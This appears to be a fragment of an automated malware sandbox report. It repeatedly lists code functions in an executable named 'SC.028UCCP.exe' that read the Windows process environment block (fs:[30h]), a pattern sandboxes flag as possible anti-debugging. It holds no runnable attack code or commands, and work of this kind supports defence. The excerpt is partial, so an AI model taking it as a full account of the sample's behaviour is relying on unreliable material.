          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EE3608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EE3608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EE3608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7D600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7D600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8360F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F24600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F0F607 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E537E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E537E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E537E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E537E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E537E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E537E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E537E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7E7E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E577F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E577F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F0F7CF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E507A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F217BC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1D7A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1D7A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1D7A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ECE79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ECE79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ECE79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ECE79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ECE79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ECE79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ECE79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ECE79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ECE79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F2B781 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F2B781 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E81796 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E81796 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E62760 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E91763 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E91763 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E91763 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E91763 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E91763 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E91763 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E54779 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E54779 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E80774 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8174A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ED174B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ED174B mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E83740 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E72755 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E72755 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E72755 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E72755 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E72755 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E72755 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8A750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFE750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E79723 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4B705 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4B705 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4B705 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4B705 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5D700 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F0F717 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7270D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7270D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7270D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1970B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1970B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5471B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5471B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4C0F6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8D0F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8D0F0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E490F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E490F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E490F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E490F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4B0D6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4B0D6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4B0D6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4B0D6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E6B0D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F250B7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF0A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF0A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF0A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF0A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF0A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF0A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF0A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E900A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F0B0AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F24080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F24080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F24080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F24080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F24080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F24080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F24080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4C090 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4A093 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EF9060 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E56074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E56074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E57072 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F2505B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E80044 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E51051 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E51051 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4D02D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E75004 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E75004 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E58009 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92010 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E591E5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E591E5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5A1E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5A1E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5A1E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5A1E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5A1E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7B1E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7B1E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7B1E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7B1E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7B1E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7B1E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7B1E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E481EB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E491F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E491F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E601F1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E601F1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E601F1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7F1F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7F1F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F181EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F181EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E601C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E601C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E651C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E651C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E651C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E651C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F251B6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8E1A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8E1A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E841BB mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E841BB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E841BB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E831BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E831BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E54180 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E54180 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E54180 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E79194 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E91190 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E91190 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8716D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EA717A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EA717A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E56179 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4A147 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4A147 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4A147 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EE314A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EE314A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EE314A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EE314A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F23157 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F23157 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F23157 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8415F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F25149 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E87128 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E87128 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F0F13E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EDA130 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5510D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E80118 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E472E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5A2E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5A2E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5A2E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5A2E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5A2E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5A2E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E582E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E582E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E582E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E582E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4D2EC mov eax, dword ptr fs:[00000030h]
